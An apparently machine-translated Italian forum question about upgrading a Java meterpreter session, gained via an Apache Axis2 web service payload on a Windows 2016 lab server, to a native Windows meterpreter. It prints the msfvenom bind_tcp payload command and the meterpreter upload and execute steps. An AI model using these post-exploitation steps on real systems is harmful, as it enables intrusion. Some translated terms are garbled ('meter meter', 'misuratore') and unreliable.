Sono riuscito a ottenere una sessione meterpreter in esecuzione tra i miei server Kali Linux e Windows 2016 caricando un payload come servizio Web di Axis2 di Apache.
Voglio passare a un meter meter di Windows (per utilizzare gli exploit di Windows). Ho provato a creare nuovi payload .exe con msfvenom e li ho caricati ed eseguiti attraverso la sessione java meterpreter. Ma non riesco a ottenere un nuovo misuratore di Windows in esecuzione.
Questo è quello che ho provato:
root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -f exe > bindtcp5555.exe
meterpreter> upload /root/bindtcp5555.exe
...
[*] uploaded : bindtcp5555.exe -> bindtcp5555.exe
meterpreter > execute -f bindtcp5555.exe -m
Process created.
Quindi posso caricare ed eseguire il payload ma quando controllo i processi in esecuzione non è nella lista e il mio gestore metasploit non può stabilire una sessione con tcp bind.
Che cosa sto sbagliando?